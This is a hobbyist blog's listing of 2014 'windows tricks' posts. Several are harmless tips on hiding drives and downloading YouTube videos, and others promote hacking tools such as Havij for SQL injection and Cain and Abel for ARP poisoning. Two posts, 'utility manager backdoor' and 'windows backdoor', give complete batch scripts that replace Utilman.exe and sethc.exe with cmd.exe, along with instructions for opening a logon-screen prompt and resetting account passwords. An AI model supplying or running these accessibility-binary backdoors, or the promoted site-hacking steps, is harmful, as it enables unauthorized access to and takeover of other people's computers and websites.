Pages

Showing posts with label windows tricks. Show all posts
Showing posts with label windows tricks. Show all posts

hide drives

Sunday, 25 May 2014
steps:
1. Go to start->run.Type regedit.Now go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 \Explorer

2. In the right pane create a new DWORD item and name it NoDrives(it is case sensitive).

3. Modify it's value and set it to 3FFFFFF (Hexadecimal) .

4. Restart the computer.

5. Now when you click on My Computer, no drives will be shown(all gone...).

To enable display of drives in My Computer, simply delete this DWORD item that you created. Restart your computer. All the drives are back again.

Read more ...

create a folder with no name

Sunday, 25 May 2014
steps:
select any folder
>rename it
>press alt & type 0160 or 255

>enter
Read more ...

hacking websites using havij tool

Saturday, 18 January 2014

havij:

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software, user can perform back-end database fingerprinting, retrieve DBMS login names and password hashes, dump tables and columns, fetch data from the database, execute SQL statements against the server, and even access the underlying file system and execute operating system shell commands.

The distinctive power of Havij that differentiates it from similar tools lies in its unique methods of injection. The success rate of attack on vulnerable targets using Havij is above 95%.

Read more ...

recovery windows passwords using cain and abel

Saturday, 18 January 2014

cain and abel:
Cain and Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some non standard utilities for Microsoft Windows users.

It allows easy recovery of several kinds of passwords by sniffing the network. APR (ARP Poison Routing) is a main feature of the program. It enables sniffing on switched networks and the hijacking of IP traffic between hosts. The name and ;ARP Poison Routing and derives from the two steps needed to perform such unusual network sniffing: an ARP Poison Attack and routing packets to the correct destination



 
Read more ...

advance port scanner

Saturday, 18 January 2014

advance port scanner:
Advanced Port Scanner is yet another port scanner that provides a fast engine and an easy to use interface.which is used to scan for the open and closed ports.
scan for the open ports using the advance port scanner through which you can access the files.
check for the open ports and access the control through it.
Read more ...

angry ip scanner

Saturday, 18 January 2014
angry ip scanner:

 Angry IP Scanner is an open-source and cross-platform network scanner designed to be fast and simple to use. It scans IP addresses and ports.

 find out whether an IP is alive or dead using an angry ip scanner. 
 scan for the target ip whether alive or dead
you can check ur ipadress by following command in command prompt

command:ipconfig
in linux:ifconfig
Read more ...

view the most shared and most viewed videos of another countries

Friday, 17 January 2014
open the link as shown below
 http://www.youtube.com/trendsdashboard#loc0=ind

open the link to view the top videos of any country 




Read more ...

utility manager backdoor

Friday, 17 January 2014
code:@echo off
pause
takeown /f %systemroot%\system32\Utilman.exe
icacls %systemroot%\system32\Utilman.exe /grant administrators:f
rename %systemroot%\system32\Utilman.exe  Utilman.exe.exe.bak
copy %systemroot%\system32\cmd.exe %systemroot%\system32\cmd3.exe
rename %systemroot%\system32\cmd3.exe Utilman.exe
pause
echo click on utilmanager (Blue Color icon) at logon screen
pause


copy the code into notepad and save as file name.bat
run the file as administrator by right clicking the file

click on the left bottom corner blue color  icon on logon screen to open the prompt and change the password through cmd prompt.


Read more ...

windows backdoor

Friday, 17 January 2014
sticky keys and utility manager are the backdoors of windows operating system
goto:c:\windows\system32\sethc.exe



code:

@echo off
pause
takeown /f %systemroot%\system32\sethc.exe
icacls %systemroot%\system32\sethc.exe /grant administrators:f
rename %systemroot%\system32\sethc.exe  sethc.exe.bak
copy %systemroot%\system32\cmd.exe %systemroot%\system32\cmd3.exe
rename %systemroot%\system32\cmd3.exe sethc.exe
pause
echo Now press the Shift key 5 times at Logon Screen.
pause


1.copy the code into notepad & save the file as file name.bat
2.run the file name.bat as run as administrator on right clicking the file

after the execution of file sethc.exe appears as follows:


press shift key for 5 times which opens the cmd prompt at logon screen
use following commands to change the password at logon screen




Read more ...

download youtube videos directly without any software

Thursday, 16 January 2014
steps to download:
1.open video which u want to download
example:
http://www.youtube.com/watch?v=RahEtkVxAPA

replace above url as below
 http://www.ssyoutube.com/watch?v=RahEtkVxAPA

 which shows the downloading formats & click on the format which u want to download as shown in below

Read more ...

how to hide drives through cmd

Thursday, 16 January 2014
to hide drive:
1.open run & type diskpart



2.list volume
3.select volume (as listed as shown in fig)
4.remove letter j (letter of drive which u likes to hide)

to unhide the drive:
1.list volume
2.select volume (which u likes to unhide)
3.assign letter j

Read more ...